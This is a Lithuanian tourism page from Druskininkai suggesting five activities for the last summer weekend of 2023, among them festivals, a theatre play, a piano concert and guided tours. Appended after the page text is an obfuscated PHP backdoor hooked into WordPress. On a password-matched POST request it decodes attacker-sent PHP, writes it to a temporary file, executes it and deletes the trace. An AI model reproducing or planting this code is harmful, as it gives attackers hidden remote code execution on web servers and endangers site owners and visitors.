fbpx
A A
A A

TOP5 paskutinio vasaros savaitgalio veiklos

2023.08.24

Ką veikti paskutinį vasaros savaitgalį? Turime atsakymą! Jūsų dėmesiui – 5 idėjos, kurias galite išbandyti Druskininkų kurorte.

Perskyrimas

Atsisveikinimo su vasara šventė „Vasaros aidai“

Baigiantis vasarai, Druskininkai kviečia į jau tradicine tapusią atsisveikinimo su vasara šventę „Vasaros aidai“. įvairiose miesto erdvėse vyks šventė su visa palete pramogų, reginių ir veiklų. Šįmet šventėje skambės ypač daug muzikos, skirtos vaikams, jaunimui, dainuojamosios poezijos mėgėjams. Ypatingas muzikos ir judesio reginys laukia Druskonio ežero pakrantėje.

Renginio laikas: rugpjūčio 24 – 27 d.
Renginio vieta: įvairios miesto erdvės
PROGRAMA

Perskyrimas

Dainuojamosios poezijos šventė „Spinduliuojantys poeziją“

Šventė su gera poezija, autorine muzika, lyrine nuotaika, mylimais aktoriais ir bardais – gera proga pristabdyti beprotišką lėkimą, pasisemti šviesių emocijų ir nusitekti minoriškam rudeniui. Pirmas vakaras išskirtinis – jis skirtas Dzūkijos (Dainavos) metams paminėti. Veronika Povilionienė – nuostabioji lietuvių liaudies folkloro dainininkė, kilusi iš Dzūkijos, garsėjanti tradicinėmis liaudies dainomis ir moderniomis liaudies dainų aranžuotėmis, kartu su scenos partneriais pristatys specialiai šiai progai parengtą programą.

Renginio laikas: rugpjūčio 25 – 26 d.
Renginio vieta: įvairios miesto erdvės
PROGRAMA

Perskyrimas

Spektaklis „Stepai, gazo!“

„Stepai, gazo!“ – tai dviejų aktorių storytellingo spektaklis, smagia ir ironiška forma atskleidžiantis neįtikėtinai įdomius, bet mažai kam žinomus Lietuvos didžiojo kunigaikščio Stepono Batoro gyvenimo įvykius. Jau pirmosiomis spektaklio minutėmis žiūrovams taps akivaizdu, kad S. Batoro gyvenimas yra kupinas įdomių, intriguojančių ir įtraukiančių nuotykių. Šis mūsų šalies valdovas kilo iš Transilvanijos, kuri pasauliui yra puikiai žinoma dėl joje gyvenusio legendinio grafo Drakulos ir jo šiurpių istorijų. Renginys nemokamas!

Renginio laikas: rugpjūčio 25 d., 18:00 val.
Renginio vieta: Leipalingio dvaras
Daugiau informacijos čia.

Perskyrimas

58 Fortepijoninės vasaros uždarymo koncertas

58-oji Fortepijoninės muzikos vasara” klausytojams, grįžtantiems į obelų sodą prie Čiurlionių namelių Druksininkuose, ar naujai atrandančių šią palaimintą muzikos klausymo erdvę, padovanos nemažai pačių įvairiausių muzikinių atradimų. Vienas jų – ciklą užbaigsiantis fortepijoninio dueto, Sonatos ir Roko Zubovų, rečitalis „Miške su Čiurlioniu ir Dvoraku“.

Renginio laikas: rugpjūčio 26 d., 18:00 val.
Renginio vieta: M. K. Čiurlionio namai-muziejus
Daugiau informacijos čia.

Perskyrimas

Pažintinės edukacijos

Apsilankykite ekskursijoje, išbandykite įvairias edukacijas vos nuo 5€ ir atraskite Druskininkų kurortą naujai! Nenuvilkite savo smalsumo ir pasinerti į mūsų kurorto paslaptis!

Renginio laikas: rugpjūčio 25 – 27 d.
Renginio vieta: įvairios miesto erdvės
Kaina: nuo 5Eur/asm.
Daugiau informacijos čia.

Perskyrimas

VISI KURORTO RENGINIAI

PAŽINTINĖS EDUKACIJOS IR EKSKURSIJOS

Daugiau turizmo informacijos galite sužinoti telefonu +370 313 51 777, el. paštu information@druskininkai.lt bei apsilankę turizmo informacijos centre adresu M. K. Čiurlionio g. 65, Druskininkai.

Parengė Druskininkų turizmo ir verslo informacijos centras

www.druskininkai.lt

 

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}